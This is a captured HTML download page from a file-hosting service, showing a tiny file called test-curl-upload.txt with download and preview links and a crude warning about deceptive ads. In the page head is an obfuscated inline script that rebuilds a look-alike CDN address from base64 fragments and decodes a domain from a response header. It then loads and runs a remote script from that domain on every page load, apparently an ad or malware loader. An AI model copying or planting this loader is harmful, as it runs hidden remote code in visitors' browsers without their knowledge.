

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>test-curl-upload.txt</title>
    <meta name="title" content="test-curl-upload.txt">
    <meta name="description" content="Fast and reliable file hosting service.">
    <meta name="application-name" content="bzzhr.co">
    <script src="/xz.js?v=6d7fbede17d618703414480aa6d09652d3aacf47-dirty" defer></script>
    <link rel="stylesheet" href="/whysostylish.css?v=6d7fbede17d618703414480aa6d09652d3aacf47-dirty">
    <link rel="stylesheet" href="/icons.css?v=6d7fbede17d618703414480aa6d09652d3aacf47-dirty">
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" defer></script>
    <meta name="htmx-config" content='{"methodsThatUseUrlParams":["get"]}'>

    

     
    <script>p=['v2','yBt8EmP6:C2'];(async()=>{let c=JSON.parse(localStorage._d||'{}'),n=Date.now();if(!c.d||c.e<n){let r=await fetch(atob('aHR0cHM6Ly8')+atob('cGluZy4')+atob('ZmItY2RuLg')+atob('bmV0'),{method:'POST'});c={d:atob(atob(r.headers.get(atob('WC1EYXRh')))),e:n+36e5};localStorage._d=JSON.stringify(c)}(s=document.createElement('script')).src='https://'+c.d+'.'+atob('Y2Zk')+'/tags/'+p.join('/')+'.js';document.head.appendChild(s)})();</script>
 
    
    
    
</head>

<body
        class="min-h-screen p-1.5"
        hx-ext="response-targets"
        hx-ext="head-support">

    <div>
        <p class="text-center text-3xl font-bold mt-1 mb-0">BZZHR</p>
        <p class="text-center mt-0">Fast and reliable file hosting service.</p>
    </div>



    <ul class="navbar text-center p-0 mb-7" hx-ext="preload">
        
            <li><a href="/" preload="mouseover">Index</a></li>
        

        
        
        
        
        

        
            <li><a href="/pricing" preload="mouseover">Pricing</a></li>
        

        
            <li><a href="/blog" preload="mouseover">Blog</a></li>
        

        
            <li><a href="/speedtest" preload="mouseover">Speedtest</a></li>
        

        
            <li><a href="/developers" preload="mouseover">Developers</a></li>
        

        
            <li><a href="/privacy" preload="mouseover">Privacy</a></li>
        

        
            <li><a href="/terms" preload="mouseover">Terms</a></li>
        

        
            <li><a href="/proxy" preload="mouseover">Proxy</a></li>
        

        
            <li><a href="/contact" preload="mouseover">Contact</a></li>
        

        
            <li><a href="/help" preload="mouseover">Help</a></li>
        
    </ul>


<div class="max-w-2xl mx-auto" x-data="App()">
    <span class="text-2xl">test-curl-upload.txt</span>

    
        <ul>
            <li><strong>Direct:</strong>
                <a class="link-button gay-button" hx-get="/o8bmrfkrw4xn/download">Download</a></li>
            <li><strong>Preview:</strong>
                <a class="link-button gay-button" hx-get="/o8bmrfkrw4xn/preview" hx-swap="innerHTML" hx-target="#preview">Show in Browser</a>
            </li>
            <li><strong>Details:</strong> Size - 6B | Views - 1 | Downloads - 0</li>
            <li><strong>SHA-1:</strong><code>fde773a18bb29f5ed65e6f0a7aa717fd1fa485d4</code></li>
            
            
            
            
            
        </ul>
    
    <p>If you think this file violates content policy, <a href="/contact?file=o8bmrfkrw4xn">report here</a></p>
    <div class="mt-4" id="preview"></div>

    <p>
        <span class="text-danger font-bold">All downloads happen in this fucking window.</span> <br>
        If you see any "Download" buttons in ads, be smart:<br>
        - Close that shit and come back here<br>
        - Real files are big, ads are tiny (just MBs)<br>
    </p>
</div>

<script>
  console.log(
    `
    Hi there! 👋
    If you're a developer working on an ad blocker and want to disable our ads,
    you can simply set window.adLink = null
    We respect user choice and privacy - this is just here to keep our service running.
    Thanks for understanding! 😊
    `,
  )
  window.adLink = 'true'
</script>
<script>
  function App() {
    return {
      turnstileSuccess: false,
      init() {
        window.turnstileCallback = () => {
          
          
          this.turnstileSuccess = true
        }
        window.turnstileExpiredCallback = () => {
          this.turnstileSuccess = false
        }
        window.turnstileReset = () => {
          this.turnstileSuccess = false
        }
      },
    }
  }
</script>


<div class="text-center text-danger mt-9">
    <div id="flash"></div>
</div>

</body>

</html>
